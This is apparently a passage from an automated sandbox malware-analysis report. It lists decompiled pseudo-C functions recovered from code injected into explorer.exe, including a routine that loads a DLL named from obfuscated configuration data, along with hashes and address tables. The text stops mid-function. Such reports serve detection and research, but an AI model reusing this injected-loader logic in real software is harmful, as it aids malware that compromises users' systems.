        • Instruction ID: ee5a40d96a8d170e39ef4db7aa177635ee1e57970e24f23723ed2304e9932c98
        • Opcode Fuzzy Hash: 9a2e551b63c43dc9543f3e7ae316adbf9ccf312437153ee1b23a49d91da7ae79
        • Instruction Fuzzy Hash: 69512972E00209AFEB51DFA4CC85FEEB7B9EB08304F10416AF504E7292DB749E048B65
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CC4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E000CC4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0xde688; // 0xf0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000C95E1(_t50, 0xb62);
					_t66 =  *0xde688; // 0xf0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E000C9640( &_v140, 0x40, L"%08x", E000CD400(_t66 + 0xb0, E000CC379(_t66 + 0xb0), 0));
					_t20 =  *0xde688; // 0xf0000
					asm("sbb eax, eax");
					_t25 = E000C95E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0xde688; // 0xf0000
					_t68 = E000C92E5(_t26 + 0x1020);
					_v12 = _t68;
					E000C85D5( &_v8);
					_t32 =  *0xde688; // 0xf0000
					_t34 = E000C92E5(_t32 + 0x122a);
					 *0xde784 = _t34;
					_t35 =  *0xde684; // 0x280f8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0xde784);
					 *0xde77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E000CE171(0xdbb48, _t60);
					}
					 *0xde780 = _t38;
					E000C861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0xde780 != 0) {
						goto L10;
					} else {
						E000C861A(0xde784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0xde780 == 0) {
						_t46 =  *0xde6bc; // 0x280fa18
						 *0xde780 = _t46;
					}
					L10:
					return 1;
				}
			}


























        0x000cc4ce
        0x000cc4ce
        0x000cc4ce
        0x000cc4d1
        0x000cc4dd
        0x000cc4e8
        0x000cc504
        0x000cc509
        0x000cc512
        0x000cc514
        0x000cc51c
        0x000cc53d
        0x000cc542
        0x000cc54f
        0x000cc55a
        0x000cc561
        0x000cc568
        0x000cc579
        0x000cc57f
        0x000cc582
        0x000cc599
        0x000cc5a5
        0x000cc5ad
        0x000cc5b4
        0x000cc5ba
        0x000cc5c6
        0x000cc5cc
        0x000cc5d3
        0x000cc5e6
        0x000cc5d5
        0x000cc5d5
        0x000cc5d8
        0x000cc5de
        0x000cc5e3
        0x000cc5e8
        0x000cc5f3
        0x000cc605
        0x000cc617
        0x00000000
        0x000cc619
        0x000cc620
        0x00000000
        0x000cc626
        0x000cc627
        0x000cc627
        0x000cc62e
        0x000cc630
        0x000cc635
        0x000cc635
        0x000cc63a
        0x000cc63e
        0x000cc63e

        APIs
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: LibraryLoadmemset
        • String ID: %08x$dll
        • API String ID: 3406617148-2963171978
        • Opcode ID: 8d6fcf7fea274a47f8b53a85a2f9067f36f6f00f3362a28de413877c87709e25
        • Instruction ID: 7bb140d26ea90620d688a4d55edfb562bb055213326fc88d9619b145c98fbc54
        • Opcode Fuzzy Hash: 8d6fcf7fea274a47f8b53a85a2f9067f36f6f00f3362a28de413877c87709e25
        • Instruction Fuzzy Hash: A7319572A01244ABFB50AB64DC89F9E33ACEB54354F14402FF909DB292DB78D9458734
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D2D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
        Download Yara Rule
        C-Code - Quality: 99%
        			E000D2D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E000D5D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E000D4AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E000D4C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E000D4C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E000D5D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E000D4AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































        0x000d2d76
        0x000d2d7b
        0x000d2d7f
        0x000d2d82
        0x000d2d82
        0x000d2d85
        0x000d2d8a
        0x000d2d8f
        0x000d2d92
        0x000d2d97
        0x000d2d9a
        0x000d2da0
        0x000d2da0
        0x000d2dab
        0x000d2dae
        0x000d2db5
        0x000d2dba
        0x00000000
        0x00000000
        0x000d2dc0
        0x000d2dc5
        0x000d2dc5
        0x000d2dca
        0x000d2dd0
        0x000d2dda
        0x000d2ddf
        0x000d2de5
        0x000d2e04
        0x000d2e07
        0x000d2e12
        0x000d2e12
        0x000d2e12
        0x000d2e09
        0x000d2e09
        0x000d2e0b
        0x00000000
        0x000d2e0d
        0x000d2e0d
        0x000d2e0d
        0x000d2e0b
        0x000d2e1a
        0x000d2e1f
        0x000d2e24
        0x000d2e2a
        0x000d2e2e
        0x000d2e31
        0x000d2e34
        0x000d2e3a
        0x000d2e3f
        0x000d2e42
        0x000d2e48
        0x000d2e4d
        0x000d2e53
        0x000d2e59
        0x000d2e5e
        0x000d2e61
        0x000d2e66
        0x000d2e6a
        0x000d2e6e
        0x000d2e71
        0x000d2e74
        0x000d2e7d
        0x000d2e84
        0x000d2e87
        0x000d2e8a
        0x000d2e8f
        0x000d2e94
        0x000d2e97
        0x000d2e9a
        0x000d2e9a
        0x000d2e9e
        0x000d2ea7
        0x000d2eae
        0x000d2eb1
        0x000d2eb6
        0x000d2ebb
        0x000d2ebb
        0x000d2ebe
        0x000d2ec3
        0x00000000
        0x00000000
        0x000d2de7
        0x000d2de9
        0x000d2df6
        0x00000000
        0x00000000
        0x000d2df6
        0x000d2de9
        0x00000000
        0x000d2de5
        0x000d2ec9
        0x000d2ece
        0x000d2ed1
        0x000d2ed4
        0x000d2f7f
        0x000d2f7f
        0x000d2eda
        0x000d2eda
        0x000d2eda
        0x000d2edf
        0x000d2f09
        0x000d2f0c
        0x000d2f0c
        0x000d2f11
        0x000d2f13
        0x000d2f15
        0x000d2f18
        0x000d2f1b
        0x000d2f23
        0x000d2f28
        0x000d2f28
        0x000d2f2e
        0x000d2f31
        0x000d2f34
        0x000d2f37
        0x000d2f39
        0x000d2f39
        0x000d2f3a
        0x000d2f3a
        0x000d2f37
        0x000d2f48
        0x000d2f4b
        0x000d2f4f
        0x000d2f54
        0x000d2f57
        0x000d2f5a
        0x000d2f5a
        0x000d2f5a
        0x000d2f5d
        0x000d2f5d
        0x000d2f60
        0x000d2f60
        0x000d2ee1
        0x000d2ee1
        0x000d2ef1
        0x000d2ef4
        0x000d2ef9
        0x000d2ef9
        0x000d2efc
        0x000d2eff
        0x000d2f02
        0x000d2f04
        0x000d2f04
        0x000d2f63
        0x000d2f65
        0x000d2f68
        0x000d2f68
        0x000d2f6e
        0x000d2f72
        0x000d2f75
        0x000d2f77
        0x000d2f77
        0x000d2f88
        0x000d2f8a
        0x000d2f8a
        0x000d2f92
        0x000d2fa0
        0x000d2fa3
        0x000d2fa5
        0x000d2fc5
        0x000d2fc5
        0x000d2fc8
        0x000d2fce
        0x000d2fcf
        0x000d2fd2
        0x000d2fd4
        0x000d2fd7
        0x000d2fda
        0x000d2fdd
        0x000d2fe1
        0x000d2fe4
        0x000d2fe7
        0x000d2fea
        0x000d2fec
        0x000d2fec
        0x000d2fef
        0x000d2ff1
        0x000d2ff1
        0x000d2ff4
        0x000d2ff6
        0x000d2ff9
        0x000d3001
        0x000d3004
        0x000d3009
        0x000d3009
        0x000d300f
        0x000d3012
        0x000d3015
        0x000d3017
        0x000d3017
        0x000d3018
        0x000d3018
        0x000d3023
        0x000d3023
        0x000d3023
        0x000d3026
        0x000d3029
        0x000d3029
        0x000d302c
        0x000d302c
        0x000d2fef
        0x000d302f
        0x000d3032
        0x000d3035
        0x000d3037
        0x000d303a
        0x000d303c
        0x000d303f
        0x000d3042
        0x000d3044
        0x000d3047
        0x000d304f
        0x000d3057
        0x000d305a
        0x000d305a
        0x000d305a
        0x000d305d
        0x000d305d
        0x000d305d
        0x000d3060
        0x000d3066
        0x000d3068
        0x000d3068
        0x000d306e
        0x000d3074
        0x000d307d
        0x000d3084
        0x000d3086
        0x000d3089
        0x000d3089
        0x000d308c
        0x000d308c
        0x000d308f
        0x000d3091
        0x000d3094
        0x000d3096
        0x000d30b1
        0x000d30b1
        0x000d30b5
        0x000d30b8
        0x000d30bb
        0x000d30be
        0x000d30d4
        0x000d30d4
        0x000d30d4
        0x000d30c0
        0x000d30c0
        0x000d30c2
        0x000d30c6
        0x000d30c9
        0x00000000
        0x000d30cb
        0x000d30cb
        0x000d30cd
        0x00000000
        0x000d30cf
        0x000d30cf
        0x000d30cf
        0x000d30cd
        0x000d30c9
        0x000d30d8
        0x000d30db
        0x000d30e0
        0x000d30ea
        0x000d30ea
        0x000d30ea
        0x000d30ed
        0x000d3098
        0x000d3098
        0x000d309a
        0x000d30a1
        0x000d30a1
        0x000d30a3
        0x000d30a5
        0x000d30a7
        0x000d30ab
        0x000d30ad
        0x000d30af
        0x00000000
        0x00000000
        0x000d30af
        0x000d30ab
        0x000d309c
        0x000d309c
        0x000d309f
        0x00000000
        0x00000000
        0x000d309f
        0x000d309a
        0x000d30f7
        0x000d30f9
        0x000d30f9
        0x000d3104
        0x000d2fa7
        0x000d2fa7
        0x000d2faa
        0x00000000
        0x000d2fac
        0x000d2fac
        0x000d2fae
        0x000d2fb2
        0x00000000
        0x000d2fb4
        0x000d2fb4
        0x000d2fb4
        0x000d2fb7
        0x00000000
        0x000d2fbb
        0x000d2fc4
        0x000d2fc4
        0x000d2fb7
        0x000d2fb2
        0x000d2faa
        0x000d2f96
        0x000d2f9f
        0x000d2f9f

        APIs
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: memcpy
        • String ID:
        • API String ID: 3510742995-0
        • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction ID: ada663c656bf4378222564d16f1058757340d539b71a268776186381d56c4217
        • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction Fuzzy Hash: B4D11375600B009FCB64CF6DD8D496ABBE1FF98304B24892EE88AC7705D771E9448B65
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C4D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
        Download Yara Rule
        C-Code - Quality: 70%
        			E000C4D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0xde688; // 0xf0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E000CB7A8(0xdb9c8,  &_v516) + 1; // 0x1
					E000CA86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E000CA471( &_v556, _t298);
					 *0xde748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0xde680 = E000CE1BC(0xdb9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E000C95E1(0xdb9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0xde688; // 0xf0000
						_t127 = E000C92E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000C85D5( &_v612);
						_t130 = E000CB269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E000C861A( &_v616, 0xfffffffe);
						_t133 =  *0xde688; // 0xf0000
						_t22 = _t133 + 0x114; // 0xf0114
						E000C4A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0xde688; // 0xf0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0xde680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E000CE2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0xde6b4; // 0x280fa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E000CE2C6(_t353,  &_v588);
								_t235 =  *0xde6b4; // 0x280fa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0xde73c;
							if( *0xde73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0xde680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0xde688; // 0xf0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000C49A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0xde684; // 0x280f8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0xde688; // 0xf0000
											_t184 = E000CFC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E000C8604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E000C109A(_t262, 0x148);
													_t305 =  *0xde688; // 0xf0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E000C902D(_t271,  &_v572);
													_t272 =  *0xde688; // 0xf0000
													_t188 = E000C60DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0xde688; // 0xf0000
														__eflags = _t200 + 0x1020;
														E000C9640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000C85D5( &_v636);
														E000CA911(_t333, 0, 0xbb8, 1);
														E000C861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E000C861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000C49A5();
